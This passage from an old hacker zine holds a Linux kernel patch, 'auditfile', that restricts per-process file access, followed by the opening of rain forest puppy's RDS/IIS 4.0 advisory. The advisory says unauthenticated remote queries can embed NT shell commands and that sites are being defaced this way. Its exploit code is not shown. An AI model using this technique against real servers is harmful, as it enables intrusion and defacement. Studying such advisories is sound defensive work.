case 0:
h = 1;
break;
case ' ':
switch (parm[i+1]) {
case 'r':
parsedrule[j] = 0;
parsedrule[j+1] = 1;
j+=2;
i++;
break;
case 'w':
parsedrule[j] = 0;
parsedrule[j+1] = 2;
j+=2;
i++;
break;
case 'b':
parsedrule[j] = 0;
parsedrule[j+1] = 3;
j+=2;
i++;
break;
}
break;
default:
parsedrule[j] = parm[i];
j++;
break;
}
}
parsedrule[j] = 0;
parsedrule[j+1] = 0;
parsedrulereal = (char *) kmalloc(j + 2, GFP_KERNEL);
for (h=0;h<j+2;h++) {
parsedrulereal[h] = parsedrule[h];
}
if (p->auditfile_len > 0) {
kfree(p->auditfile);
}
p->auditfile = parsedrulereal;
p->auditfile_len = (j + 2);
}
}
read_unlock(&tasklist_lock);
return(0);
}
void cleanup_module()
{
}
-----[ END OF ADULT CONTENTS ]-----
This module attaches memory to a pid, you should load it with
insmod auditfile.o pid=PID parm="r/usr/bin/* r/etc/* r/lib/* b/tmp* w/tmp/write/*"
I made a couple of tools to automate this when a process is started,
you can find them in auditfile-0.39.tar.gz
------------------[ copying the char *auditfile and int auditfile_len to new processes
Ofcourse we want childprocesses of the processes we restricted to run
with the same auditfile rules so we add a couple of lines
to /usr/src/linux/kernel/fork.c
-----[ WARNING ADULT CONTENTS ]-----
int do_fork(unsigned long clone_flags, unsigned long usp, struct pt_regs *regs)
{
int nr;
int retval = -EINVAL;
struct task_struct *p;
struct semaphore sem = MUTEX_LOCKED;
/*
* Disallow unknown clone(2) flags, as well as CLONE_PID, unless we are
* the boot up thread.
*
* Avoid taking any branches in the common case.
*/
if (clone_flags &
(-(signed long)current->pid >> (sizeof(long) * 8 - 1)) &
~(unsigned long)(CSIGNAL |
CLONE_VM | CLONE_FS | CLONE_FILES |
CLONE_SIGHAND | CLONE_PTRACE | CLONE_VFORK))
goto fork_out;
current->vfork_sem = &sem;
retval = -ENOMEM;
p = alloc_task_struct();
if (!p)
goto fork_out;
*p = *current;
/* INCLUDED FOR AUDITFILE */
(char *)p->auditfile = 0;
p->auditfile_len = 0;
/* END OF INCLUDED FOR AUDITFILE */
down(¤t->mm->mmap_sem);
lock_kernel();
retval = -EAGAIN;
if (p->user) {
if (atomic_read(&p->user->count) >= p->rlim[RLIMIT_NPROC].rlim_cur)
goto bad_fork_free;
atomic_inc(&p->user->count);
}
{
struct task_struct **tslot;
tslot = find_empty_process();
if (!tslot)
goto bad_fork_cleanup_count;
p->tarray_ptr = tslot;
*tslot = p;
nr = tslot - &task[0];
}
if (p->exec_domain && p->exec_domain->module)
__MOD_INC_USE_COUNT(p->exec_domain->module);
if (p->binfmt && p->binfmt->module)
__MOD_INC_USE_COUNT(p->binfmt->module);
p->did_exec = 0;
p->swappable = 0;
p->state = TASK_UNINTERRUPTIBLE;
copy_flags(clone_flags, p);
p->pid = get_pid(clone_flags);
/*
* This is a "shadow run" state. The process
* is marked runnable, but isn't actually on
* any run queue yet.. (that happens at the
* very end).
*/
p->state = TASK_RUNNING;
p->next_run = p;
p->prev_run = p;
p->p_pptr = p->p_opptr = current;
p->p_cptr = NULL;
init_waitqueue(&p->wait_chldexit);
p->vfork_sem = NULL;
p->sigpending = 0;
sigemptyset(&p->signal);
p->sigqueue = NULL;
p->sigqueue_tail = &p->sigqueue;
spin_lock_init(&p->priv_lock);
p->priv = 0;
p->ppriv = current->priv;
p->it_real_value = p->it_virt_value = p->it_prof_value = 0;
p->it_real_incr = p->it_virt_incr = p->it_prof_incr = 0;
init_timer(&p->real_timer);
p->real_timer.data = (unsigned long) p;
p->leader = 0; /* session leadership doesn't inherit */
p->tty_old_pgrp = 0;
p->times.tms_utime = p->times.tms_stime = 0;
p->times.tms_cutime = p->times.tms_cstime = 0;
#ifdef __SMP__
{
int i;
p->has_cpu = 0;
p->processor = current->processor;
/* ?? should we just memset this ?? */
for(i = 0; i < smp_num_cpus; i++)
p->per_cpu_utime[i] = p->per_cpu_stime[i] = 0;
spin_lock_init(&p->sigmask_lock);
}
#endif
p->lock_depth = -1; /* -1 = no lock */
p->start_time = jiffies;
retval = -ENOMEM;
/* copy all the process information */
if (copy_files(clone_flags, p))
goto bad_fork_cleanup;
if (copy_fs(clone_flags, p))
goto bad_fork_cleanup_files;
if (copy_sighand(clone_flags, p))
goto bad_fork_cleanup_fs;
if (copy_mm(nr, clone_flags, p))
goto bad_fork_cleanup_sighand;
retval = copy_thread(nr, clone_flags, usp, p, regs);
if (retval)
goto bad_fork_cleanup_mm;
p->semundo = NULL;
/* INCLUDED FOR AUDITFILE */
if (current->auditfile_len > 0) {
p->auditfile_len = current->auditfile_len;
(char *)p->auditfile = (char *) kmalloc(p->auditfile_len, GFP_KERNEL);
if ((char *)p->auditfile == NULL) {
printk(KERN_INFO "Warning: out of mem to add auditfile rules to process %d\n", p->pid);
p->auditfile_len = 0;
} else {
memcpy(p->auditfile, current->auditfile, current->auditfile_len);
}
}
/* END OF INCLUDED FOR AUDITFILE */
/* ok, now we should be set up.. */
p->swappable = 1;
p->exit_signal = clone_flags & CSIGNAL;
p->pdeath_signal = 0;
/*
* "share" dynamic priority between parent and child, thus the
* total amount of dynamic priorities in the system doesnt change,
* more scheduling fairness. This is only important in the first
* timeslice, on the long run the scheduling behaviour is unchanged.
*/
current->counter >>= 1;
p->counter = current->counter;
/*
* Ok, add it to the run-queues and make it
* visible to the rest of the system.
*
* Let it rip!
*/
retval = p->pid;
if (retval) {
write_lock_irq(&tasklist_lock);
SET_LINKS(p);
hash_pid(p);
write_unlock_irq(&tasklist_lock);
nr_tasks++;
p->next_run = NULL;
p->prev_run = NULL;
wake_up_process(p); /* do this last */
}
++total_forks;
bad_fork:
unlock_kernel();
up(¤t->mm->mmap_sem);
fork_out:
if ((clone_flags & CLONE_VFORK) && (retval > 0))
down(&sem);
return retval;
bad_fork_cleanup_mm:
mmput(p->mm);
p->mm = NULL;
bad_fork_cleanup_sighand:
exit_sighand(p);
bad_fork_cleanup_fs:
exit_fs(p); /* blocking */
bad_fork_cleanup_files:
exit_files(p); /* blocking */
bad_fork_cleanup:
if (p->exec_domain && p->exec_domain->module)
__MOD_DEC_USE_COUNT(p->exec_domain->module);
if (p->binfmt && p->binfmt->module)
__MOD_DEC_USE_COUNT(p->binfmt->module);
add_free_taskslot(p->tarray_ptr);
bad_fork_cleanup_count:
if (p->user)
free_uid(p);
bad_fork_free:
free_task_struct(p);
goto bad_fork;
}
-----[ END OF ADULT CONTENTS ]-----
Besides editing the fork, we should make it init a char *auditfile and
a int auditfile_len on the first process (the process of init) so in
/usr/src/linux/kernel/init.c we add something 2
-----[ WARNING ADULT CONTENTS ]-----
static int init(void * unused)
{
lock_kernel();
do_basic_setup();
/*
* Ok, we have completed the initial bootup, and
* we're essentially up and running. Get rid of the
* initmem segments and start the user-mode stuff..
*/
free_initmem();
unlock_kernel();
/* INCLUDED FOR AUDITFILE */
(char *)current->auditfile = 0;
current->auditfile_len = 0;
/* END OF INCLUDED FOR AUDITFILE */
-----[ END OF ADULT CONTENTS ]-----
------------------[ destroying memory when process dies
Because this is arch specific and i use an x86 i only edit
/usr/src/linux/arch/i386/kernel/process.c
-----[ WARNING ADULT CONTENTS ]-----
void free_task_struct(struct task_struct *p)
{
/* INCLUDED FOR AUDITFILE */
if (p->auditfile_len > 0) {
kfree(p->auditfile);
}
{
/* END OF INCLUDED FOR AUDITFILE */
#ifdef EXTRA_TASK_STRUCT
int index = task_struct_stack_ptr+1;
if (index < EXTRA_TASK_STRUCT) {
task_struct_stack[index] = p;
task_struct_stack_ptr = index;
} else
#endif
free_pages((unsigned long) p, 1);
/* INCLUDED FOR AUDITFILE */
}
/* END OF INCLUDED FOR AUDITFILE */
}
-----[ END OF ADULT CONTENTS ]-----
------------------[ check for auditfile rules when a process wants to read/write to a file
When a process opens a file, it calls the sys_open function, and this
function calls (via via) open_namei()
This function looks this on 2.2.12:
-----[ WARNING ADULT CONTENTS ]-----
/*
* open_namei()
*
* namei for open - this is in fact almost the whole open-routine.
*
* Note that the low bits of "flag" aren't the same as in the open
* system call - they are 00 - no permissions needed
* 01 - read permission needed
* 10 - write permission needed
* 11 - read/write permissions needed
* which is a lot more logical, and also allows the "no perm" needed
* for symlinks (where the permissions are checked later).
*/
struct dentry * open_namei(const char * pathname, int flag, int mode)
{
int acc_mode, error;
struct inode *inode;
struct dentry *dentry;
mode &= S_IALLUGO & ~current->fs->umask;
mode |= S_IFREG;
dentry = lookup_dentry(pathname, NULL, lookup_flags(flag));
if (IS_ERR(dentry))
return dentry;
acc_mode = ACC_MODE(flag);
if (flag & O_CREAT) {
struct dentry *dir;
if (dentry->d_inode) {
error = -EEXIST;
if (flag & O_EXCL)
goto exit;
#ifdef CONFIG_SECURE_FIFO
if (!S_ISFIFO(dentry->d_inode->i_mode))
goto nocreate;
#else
goto nocreate;
#endif
}
dir = lock_parent(dentry);
if (!check_parent(dir, dentry)) {
/*
* Really nasty race happened. What's the
* right error code? We had a dentry, but
* before we could use it it was removed
* by somebody else. We could just re-try
* everything, I guess.
*
* ENOENT is definitely wrong.
*/
error = -ENOENT;
unlock_dir(dir);
goto exit;
}
#ifdef CONFIG_SECURE_FIFO
/*
* Don't write to FIFOs that we don't own in +t directories,
* unless the FIFO is owned by root.
*/
if ((inode = dentry->d_inode))
if (S_ISFIFO(inode->i_mode) && !(flag & O_EXCL) &&
(dir->d_inode->i_mode & S_ISVTX) &&
inode->i_uid &&
current->fsuid != inode->i_uid) {
security_alert("denied writing FIFO of %d.%d "
"by UID %d, EUID %d, process %s:%d",
"writes into a FIFO denied",
inode->i_uid, inode->i_gid,
current->uid, current->euid,
current->comm, current->pid);
error = -EACCES;
unlock_dir(dir);
goto exit;
}
#endif
/*
* Somebody might have created the file while we
* waited for the directory lock.. So we have to
* re-do the existence test.
*/
if (dentry->d_inode) {
error = 0;
if (flag & O_EXCL)
error = -EEXIST;
} else if ((error = may_create(dir->d_inode, dentry)) == 0) {
if (!dir->d_inode->i_op || !dir->d_inode->i_op->create)
error = -EACCES;
else {
DQUOT_INIT(dir->d_inode);
error = dir->d_inode->i_op->create(dir->d_inode, dentry, mode);
/* Don't check for write permission, don't truncate */
acc_mode = 0;
flag &= ~O_TRUNC;
}
}
unlock_dir(dir);
if (error)
goto exit;
}
nocreate:
error = -ENOENT;
inode = dentry->d_inode;
if (!inode)
goto exit;
error = -ELOOP;
if (S_ISLNK(inode->i_mode))
goto exit;
error = -EISDIR;
if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE))
goto exit;
error = permission(inode,acc_mode);
if (error)
goto exit;
/*
* FIFO's, sockets and device files are special: they don't
* actually live on the filesystem itself, and as such you
* can write to them even if the filesystem is read-only.
*/
if (S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) {
flag &= ~O_TRUNC;
} else if (S_ISBLK(inode->i_mode) || S_ISCHR(inode->i_mode)) {
error = -EACCES;
if (IS_NODEV(inode))
goto exit;
flag &= ~O_TRUNC;
} else {
error = -EROFS;
if (IS_RDONLY(inode) && (flag & 2))
goto exit;
}
/*
* An append-only file must be opened in append mode for writing.
*/
error = -EPERM;
if (IS_APPEND(inode)) {
if ((flag & FMODE_WRITE) && !(flag & O_APPEND))
goto exit;
if (flag & O_TRUNC)
goto exit;
}
if (flag & O_TRUNC) {
error = get_write_access(inode);
if (error)
goto exit;
/*
* Refuse to truncate files with mandatory locks held on them.
*/
error = locks_verify_locked(inode);
if (!error) {
DQUOT_INIT(inode);
error = do_truncate(dentry, 0);
}
put_write_access(inode);
if (error)
goto exit;
} else
if (flag & FMODE_WRITE)
DQUOT_INIT(inode);
return dentry;
exit:
dput(dentry);
return ERR_PTR(error);
}
-----[ END OF ADULT CONTENTS ]-----
This function checks permissions, resolvs symlinks and so on, when
everything is ok return dentry and permission is granded. We don't
want to lose normal restrictions and have our auditfile rules
overrule general permissions so we have to put our rules as last,
just before return dentry.
This is how i implemented it:
-----[ WARNING ADULT CONTENTS ]-----
/*
* open_namei()
*
* namei for open - this is in fact almost the whole open-routine.
*
* Note that the low bits of "flag" aren't the same as in the open
* system call - they are 00 - no permissions needed
* 01 - read permission needed
* 10 - write permission needed
* 11 - read/write permissions needed
* which is a lot more logical, and also allows the "no perm" needed
* for symlinks (where the permissions are checked later).
*/
struct dentry * open_namei(const char * pathname, int flag, int mode)
{
int acc_mode, error;
struct inode *inode;
struct dentry *dentry;
mode &= S_IALLUGO & ~current->fs->umask;
mode |= S_IFREG;
dentry = lookup_dentry(pathname, NULL, lookup_flags(flag));
if (IS_ERR(dentry))
return dentry;
acc_mode = ACC_MODE(flag);
if (flag & O_CREAT) {
struct dentry *dir;
if (dentry->d_inode) {
error = -EEXIST;
if (flag & O_EXCL)
goto exit;
#ifdef CONFIG_SECURE_FIFO
if (!S_ISFIFO(dentry->d_inode->i_mode))
goto nocreate;
#else
goto nocreate;
#endif
}
dir = lock_parent(dentry);
if (!check_parent(dir, dentry)) {
/*
* Really nasty race happened. What's the
* right error code? We had a dentry, but
* before we could use it it was removed
* by somebody else. We could just re-try
* everything, I guess.
*
* ENOENT is definitely wrong.
*/
error = -ENOENT;
unlock_dir(dir);
goto exit;
}
#ifdef CONFIG_SECURE_FIFO
/*
* Don't write to FIFOs that we don't own in +t directories,
* unless the FIFO is owned by root.
*/
if ((inode = dentry->d_inode))
if (S_ISFIFO(inode->i_mode) && !(flag & O_EXCL) &&
(dir->d_inode->i_mode & S_ISVTX) &&
inode->i_uid &&
current->fsuid != inode->i_uid) {
security_alert("denied writing FIFO of %d.%d "
"by UID %d, EUID %d, process %s:%d",
"writes into a FIFO denied",
inode->i_uid, inode->i_gid,
current->uid, current->euid,
current->comm, current->pid);
error = -EACCES;
unlock_dir(dir);
goto exit;
}
#endif
/*
* Somebody might have created the file while we
* waited for the directory lock.. So we have to
* re-do the existence test.
*/
if (dentry->d_inode) {
error = 0;
if (flag & O_EXCL)
error = -EEXIST;
} else if ((error = may_create(dir->d_inode, dentry)) == 0) {
if (!dir->d_inode->i_op || !dir->d_inode->i_op->create)
error = -EACCES;
else {
DQUOT_INIT(dir->d_inode);
error = dir->d_inode->i_op->create(dir->d_inode, dentry, mode);
/* Don't check for write permission, don't truncate */
acc_mode = 0;
flag &= ~O_TRUNC;
}
}
unlock_dir(dir);
if (error)
goto exit;
}
nocreate:
error = -ENOENT;
inode = dentry->d_inode;
if (!inode)
goto exit;
error = -ELOOP;
if (S_ISLNK(inode->i_mode))
goto exit;
error = -EISDIR;
if (S_ISDIR(inode->i_mode) && (flag & FMODE_WRITE))
goto exit;
error = permission(inode,acc_mode);
if (error)
goto exit;
/*
* FIFO's, sockets and device files are special: they don't
* actually live on the filesystem itself, and as such you
* can write to them even if the filesystem is read-only.
*/
if (S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) {
flag &= ~O_TRUNC;
} else if (S_ISBLK(inode->i_mode) || S_ISCHR(inode->i_mode)) {
error = -EACCES;
if (IS_NODEV(inode))
goto exit;
flag &= ~O_TRUNC;
} else {
error = -EROFS;
if (IS_RDONLY(inode) && (flag & 2))
goto exit;
}
/*
* An append-only file must be opened in append mode for writing.
*/
error = -EPERM;
if (IS_APPEND(inode)) {
if ((flag & FMODE_WRITE) && !(flag & O_APPEND))
goto exit;
if (flag & O_TRUNC)
goto exit;
}
if (flag & O_TRUNC) {
error = get_write_access(inode);
if (error)
goto exit;
/*
* Refuse to truncate files with mandatory locks held on them.
*/
error = locks_verify_locked(inode);
if (!error) {
DQUOT_INIT(inode);
error = do_truncate(dentry, 0);
}
put_write_access(inode);
if (error)
goto exit;
} else
if (flag & FMODE_WRITE)
DQUOT_INIT(inode);
if (current->auditfile_len > 0) {
int i; char *filename; int errorauditfile=0;
if (pathname[0] != '/') {
char *page = (char *) __get_free_page(GFP_USER);
struct dentry * dentrybackup = dentry;
if (page) {
char * end = page+PAGE_SIZE;
char * retval;
struct dentry * root = current->fs->root;
int buflen = PAGE_SIZE;
*--end = '\0';
buflen--;
for (;;) {
struct dentry * parent;
int namelen;
if (dentry == root)
break;
dentry = dentry->d_covers;
parent = dentry->d_parent;
if (dentry == parent)
break;
namelen = dentry->d_name.len;
buflen -= namelen + 1;
if (buflen < 0)
break;
end -= namelen;
memcpy(end, dentry->d_name.name, namelen);
*--end = '/';
retval = end;
dentry = parent;
}
dentry = dentrybackup;
filename=retval;
free_page((unsigned long) page);
} else {
printk(KERN_INFO "auditfile: out of memory, dropped auditfile security\n");
return dentrybackup;
}
} else {
filename = pathname;
}
for(i=0;i<current->auditfile_len;i++) {
if (current->auditfile[i] == 0) {
if (current->auditfile[i+1] == 0)
break;
if ((((flag & FMODE_WRITE) && (current->auditfile[i+1] == 2) || (current->auditfile[i+1] == 3)) || !(flag & FMODE_WRITE)) && (((flag & FMODE_READ) && (current->auditfile[i+1] == 1) || (current->auditfile[i+1] == 3)) || !(flag & FMODE_READ))) {
if (auditfile_expression(filename, current->auditfile + i + 2) == 1) {
errorauditfile = 1;
break;
}
}
}
}
if (errorauditfile != 1) {
error = -EACCES;
goto exit;
}
}
return dentry;
exit:
dput(dentry);
return ERR_PTR(error);
}
-----[ END OF ADULT CONTENTS ]-----
The function auditfile_expression is the following:
-----[ WARNING ADULT CONTENTS ]-----
int auditfile_expression(char *string_base, char *string_mask)
{
int i, j, ok=0;
for (i=0;;i++) {
if (((string_mask[i] == 0) && (string_base != 0)) || ((string_mask[i] != 0) && (string_base == 0))) return 1;
if (string_mask[i] == '*') {
for (j = 0;;j++) {
if (auditfile_expression(string_base + i + j, string_mask + i + 1) == 1) return 1;
if (string_base[i+j] == 0) return 0;
}
} else if (string_base[i] == string_mask[i]) ok = 1; else return 0;
}
return ok;
}
-----[ END OF ADULT CONTENTS ]-----
And basically does the matching for bl*t on blaat and so on.
----------[ some options i use at my box
in.telnetd.conf
b/dev*
r/etc/*
r/lib/*
r/usr/*
b/home/*
r/bin/*
b/tmp/*
b/var/*
website.telnetd.conf
b/dev*
r/etc/*
r/lib/*
r/usr/sbin/website
r/home/website*
w/home/website/.bash_history
r/bin/*
b/var/*
r/sbin/su
r/usr/bin/dircolors
r/security*
r/usr/bin/vi
r/usr/bin/vim
r/usr/bin/talk
r/root/.bashrc
r/usr/local/bin/tty
r/usr/local/bin/who
r/usr/bin/write
r/usr/bin/mesg
r/usr/bin/grep
r/usr/bin/awk
r/usr/bin/sed
r/usr/bin/less
r/usr/lib*
(Yeah these are the restrictions i use on the shell on our website)
-------------------------------------------------------------------------------
Download my Auditfile tarball for examples how to use this, the shell on our
website is secured with auditfile.
Some Extra Security In The Linux Kernel - Auditfile
a paper by Frank van Vliet alias {}
karin@root66.nl.eu.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RooT66 http://root66.nl.eu.org
ShellOracle http://www.shelloracle.cjb.net
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
@HWA
158.0 Lets hack an NT box...how they are being defaced & how to secure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Info submitted by: anon_defacer & compiled/assembled by Ed.
Intro:
~~~~~~
This isn't exactly bleeding edge information, I know, BUT nonetheless sites
are still currently being actively defaced en-masse using these techniques
(known simply as 'the RDS hack' around the net) so I thought it prudent to
print the info and current available attack/patch options that are in use
or should be employed on your NT server. - Ed
Source: http://www.wiretrip.net/rfp/p/doc.asp?id=1&iface=2
rainforest puppy's advisory and code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.wiretrip.net/rfp/p/doc.asp?id=5&iface=2
#### ALERT! #### RDS/IIS 4.0 Vulnerability and exploit #### ALERT! ####
By rain forest puppy / ADM / Wiretrip
"it...is direct, immediate, and almost 100% guaranteed
to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE
IS RIDICULOUS!"
-Russ Cooper, NTBugtraq
"This exploit also does *not* require the presence of
any sample web applications or example code...the
issue affects at least 50% of the IIS servers I have
seen"
-Greg Gonzalez, NTBugtraq
"Groovy, baby."
-Austin Powers, Spy who Shagged Me
- - - Table of Contents:
1. Names, PRs and the Media: State of Security Advisories
2. RDS Vulnerability Background
3. *MY* Guess at Greg's RDS Vulnerability
4. Bonus Aspects of My Version of the Exploit
5. Command Line Options
6. Random Q & A
7. Signoff
8. The code!!!!
- 1 - Names, PRs and the Media: State of Security Advisories
When I was at DefCon, I had an interview with a reporter who was doing
a story on 'hacker handles'. Of course, with a handle like Rain Forest
Puppy, I was a sure-win. After a 20 minute chat, the last question he
asked me was "What is your real name?" Of course, my response was "does
that matter?" Well, to him it did. It seems like it matters to all the
big, formal media types and vendors. A perfect example of this would be
the whole RDS saga. Greg Gonzalez's original post gave me credit, since
he used some of what I talked about in my ODBC advisory posted to Bugtraq
earlier (thanks, Greg!). Russ Cooper did a recap, but failed to mention
me. Microsoft's advisory acknowledged Russ and Greg as well, sans me.
Now, I'm not an egomaniac that needs to see my name splashed over
everything. For that matter, those of you who know me personally know how
laid back I am concerning most issues. The point I'm trying to make is
whether or not a name is 'unsuitable' for mention in something as flashy
as a Russ or MS post (although side note, I must admit, Wired and ZDNet
have lightened up to this fact, especially lately with all the Dildog and
Orifice talk going on). If I remember correctly, David Litchfield got
some mentions for various vulnerability findings he had. But everyone
referenced him as David Litchfield, not 'Mnemonix', which is his hacker
handle (BTW, greetings to Mnemonix. Thanks for serving as an example. :)
Even lately, for those of you Bugtraq fans out there (hey, how the hell
are you reading this, anyway!?!?!), you'll have noticed gone are the
loveable bytes of 'Aleph1' in place of Elias Levy. Now, in Aleph1's
defense, I can see justification of the shift. But the general fact that
there is a need/trend for a shift is concerning me.
The only taboo I can think of for the 'evil' of a hacker handle is the
issue of the obvious: anonymity. Apparently I must be running around
doing 'very bad things' (funny movie, BTW), and so I need to hide who I
really am, right?
Uh, no. (For lack of a snappy comeback)
I don't want to make this diatribe overly long, since I know you're
only here for the exploits anyway :) But seriously, why use a handle?
Well, there is a sense of tradition, for one. I shall not explain,
because I think it's apparent. The other is a sense of community. If
you're going to engage in a security discussion, why not do it with other
security professionals. And where can you just so happen to find a large
gaggle of people who know about security? Your local IRC server, sitting
in #hackphreak (watch out, JP logs), #hackteach, etc. These people have
nicknames themselves. So get yourself a nick and join in the
conversation!
But really, I use an alias. Does that make me evil? If I told you
my real name, would that shift your perspective of me into the light of
good? We'll get back to this, I want to transgress to another issue.
I use a handle. My only collateral at this point is my name, and my
name alone. If I find a big hole, post a research paper, etc, it adds
nothing but perhaps an "atta'boy" to the accomplishments of my nickname.
I've talked to people in real life and held discussions about that 'Rain
Forest Puppy' guy, they not knowing I was Rain Forest Puppy. The
accomplishments belong to that name, and that name alone...unless I start
equating that name with other things. So, let's pretend I did. Let's say
I tossed my real name out there, and got that associated with my handle.
Now people in real life will equate the findings of Rain Forest Puppy to
me. I can add in my company name. Now my company can ride the 'success'
(if you will) of my findings as well, just because they're associated with
my name. (Come on, you know these situations exist. Transmeta is cool
just because the name 'Linus' is involved.) If I equate all kinds of
aspects together, I can then distribute the attention (a.k.a. advertising)
to them all as well. Think about it....if I found the next remote root
compromise in, say, sshd, I could slap not only my handle and name but
also my company name (Amazonian Trees, Inc) all over it! Wow, would that
not be great marketing for Amazonian Trees, Inc, especially if it ATI's
primary service was security related!
But hey, it's America. We live to make money, so it seems. So why not
do this? Right? Well, 'tis also the trend.
Look at all the press releases on security issues. The most recent one
was by Greg Gonzalez himself, for his company Information Technologies
Enterprises, Inc. The press release is at
http://www.infotechent.net/itenews.htm
Now, what I find interesting is that Greg has made a post to NTBugtraq
about the RDS vulnerability, yet will not release details of the
vulnerability until next week. Hmmm. Ok, so he can't release details,
but he can release press releases about it. Your point was made with the
post to NTBugtraq...the point of the press release is to ride the fame to
gain corporate exposure (which I'm equating as an excessive, corporate,
political machine type move which isn't all that wonderful). Not to pick
on Greg, because it's the trend. Look at WebTrends. They issued a press
release on 'their finding of security vulnerabilities in IIS sample
scripts' (never mind the fact that I had talked about such in a previous
Phrack article last December). The press release is at
http://www.webtrends.com/news/releases/release.asp?id=81
Wow, a vendor of a security scanner using the finding of vulnerabilities
as free marketing for their products. Well, do it where you can, right?
I will move off this subject, because L0pht has a nice long
composition on the matter in the Soapbox on their website, at
http://www.l0pht.com/~oblivion/soapbox/index.html
One interesting statement L0pht makes, going back to Greg Gonzalez and
Russ Cooper keeping the details of the RDS vulnerability to themselves for
a week:
"Now we have software vendors keeping things secret. At
least secret for a substantial period of time. Is this
the way we want the industry to behave?"
Wow, right on, brothers Mudge, Dildog, Weld Pond et al. Greetings, BTW.
---- Credits and Thank Yous ----------------------------------------------
I'd like to take this brief moment to say thank you to L0pht (www.l0pht.com)
for helping me test my perl script and taking time to review my advisory.
I'd also like to thank Vacuum of www.technotronic.com and Mike Dinowitz
of www.houseoffusion.com for their input and testing as well.
--------------------------------------------------------------------------
So back to the 'only a handle' thing. You have to understand that I
have a different perspective on it all. I publish everything under an
anonymous handle. What do I gain from this? Nothing personally. Nadda.
Zip. The handle itself may gain some fame, but not me personally. I do
not profit from this one way or another. What I do I do because I want
to, on my free time--and do it in a manner that is not greedy in any aspect.
I don't seek to gain, and in the current setup, I really can't gain a
whole hell of a lot. But I'm the bad guy, I forgot. It's much more
normal to leverage a security vulnerability as a marketing tool than it is
to just 'give' time and research away. Wow, I need to get with the Y2K I
guess.
Fine then. (Last tangent, then we'll get to the RDS issue, I promise :)
So, going back to you seeing me in the light of good.... Could you better
relate if you had a 'normal' name? Are you embarrassed to say/use 'Rain
Forest Puppy' in conversation/publication? (Well, I mean this generically
for all hacker handles, but I'm specifically talking about mine here)
Would I be seen as more a security resource/less of a evil hacker if you
had a name to associate with my handle? Well, I guess I should make that
step. From now on, you can associate Mr. Russell F. Prigogine with the
nick Rain Forest Puppy (Hmmm...no, the initials are not mere
coincidence...clever, eh?). But since the big 'Russ' on campus is Russ
Cooper, NTBugtraq moderator extraordinaire (who believes sample apps are
not a security concern worth talking about. Real slick, Russ), I would
prefer to have be used Mr. R.F. Prigogine (Mr. optional), if you can't--or
don't want to--use the nick Rain Forest Puppy.
So there. (As some would say) I sold out (oh, the horror of it). JP,
add that to your profile database. While I gather the broken pieces of my
dignity we'll move along to what you really want...
- 2 - RDS Vulnerability Background
Last Friday Greg Gonzalez (re)posted his findings of vulnerabilities
in regards to the RDS problems originally detailed in MS98-004, which came
out around July 16, '98. He took that issue (which is basically the
simple fact that 'Remote Data Service' components allow *remote* access to
your *data*....who would have thought?) and combined it with the Jet
pipe/VBA delimiter 'feature' I discussed in my recent advisory. The
result?
1. You can make remote queries via RDS
2. You can embed NT command line commands in queries
Well, that's a pretty good combo. (side note, not to brag or anything, but
I mention the fact that RDS can be used to do that in my ODBC advisory,
under the title 'Msadc'). But, Greg threw in a twist which supposedly
is the kicker:
3. You don't need user IDs (and therefore no password required),
does *not* require the presence of any sample Web applications
or example code, or even an active database
I suppose that's a pretty big kick. Wow, no UIDs/passwords, NO SAMPLE
SCRIPTS! Well, I guess that means Russ Cooper will let the post through
then... (if you don't get it, go back and re-read section one).
So Greg can do all that. And, to reiterate how dangerous this problem
really is...
"it...is direct, immediate, and almost 100% guaranteed
to work....THE NUMBER OF HUGE SITES THAT ARE VULNERABLE
IS RIDICULOUS!"
-Russ Cooper, NTBugtraq
"This exploit also does *not* require the presence of
any sample web applications or example code...the
issue affects at least 50% of the IIS servers I have
seen"
-Greg Gonzalez, NTBugtraq
*** MEDIA FOLKS *** As it seems it's fun to attach dollar loss amounts
advisories, I will say the potential amount of
damage, due to the fact that at least 50% of all
IIS servers Greg has seen (hopefully he's seen a
lot) are vulnerable, using my sophisticated
reliable statistical computation method that is
authoritative, I'd place damage loss somewhere in
the 'close to Bill Gates salary(tm)' range.
Now, the sad part. As I mentioned before, both Greg and Russ (from this
point on, all instances of 'Russ' refer to Russ Cooper, and not the name
R. F. Prigogine) both know the details of this vulnerability. And yet
they are keeping them amongst themselves until next week. Does this even
disturb anyone? Greg says at least 50% of the IIS servers are
vulnerable...
DO WE WANT RUSS COOPER WITH THE KEYS TO 50% OF IIS SERVER ON THE INTERNET?
Ok, I have a scenario that's the same in principle, but will disturb
people even more:
---- Begin same scenario ------------------------------------------------
Rain Forest Puppy (or R. F. Prigogine, if it makes you feel better/is more
visually pleasing) has found a hole in the latest build of Apache web
server. There's a hole. I will announce there's a hole. I'll write up a
few PRs as well. But I will not tell you the exact nature of it. Don't
worry, Apache group will code a fix, and you'll be all set in a jiffy. In
the meantime, I'm not going to release the details of the exploit of the
hole. Instead I'm going to just keep it to myself....and my good buddies
Vacuum, Antilove, Stranger, and the rest of the Wiretrip and ADM crews.
-------------------------------------------------------------------------
Hmmm....I bet *that* disturbed you. How about a better translation:
---- Begin translated same scenario -------------------------------------
I, RFP, have found a hole in Apache that I will not tell you about until
later, but in the meantime, me and my hacker buddies will know about it!
Nnnnnnaaaaaaayyyyyyaaaaahhhhhh! So sit back and feel helpless.
-------------------------------------------------------------------------
What's the difference? Only the integrity of the people involved. Again,
a name thing perhaps. Russ Cooper, Greg Gonzalez, they're Ok. Rain
Forest Puppy, Antilove, nope, that's scary. You don't even know if Greg
Gonzalez isn't really a hacker that goes by 'Digital Killer'. I push for
the point that no matter who it is in any case, it's wrong.
Elias Levy would have told everyone the bug. :)
NTBugtraq = moderated disclosure. Hmmm. I still like Russ's "Would
you pay?" Administrivia from Feb 99, in which he says:
"Someone else makes the Security Portal and you get what they
think you need"
As oppose to getting what Russ thinks we need instead? It all depends on
whether or not the other guy denies posts about sample scripts....(if you
*still* don't get it, re-read section one AGAIN).
Ok, ok, so that RDS background turned more into a political thing.
